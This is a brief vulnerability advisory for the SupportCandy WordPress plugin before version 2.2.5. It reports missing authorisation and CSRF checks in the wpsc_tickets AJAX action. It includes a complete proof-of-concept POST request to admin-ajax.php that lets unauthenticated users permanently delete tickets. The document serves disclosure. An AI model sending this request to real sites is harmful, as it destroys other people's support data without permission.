The plugin does not have authorisation and CRSF checks in its wpsc_tickets AJAX action, which could allow unauthenticated users to call it and delete arbitrary tickets via the set_delete_permanently_bulk_ticket setting_action. Other actions may be affected as well.
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 81 Connection: close action=wpsc_tickets&setting;_action=set_delete_permanently_bulk_ticket&ticket;_id=3
CPE | Name | Operator | Version |
---|---|---|---|
supportcandy | lt | 2.2.5 |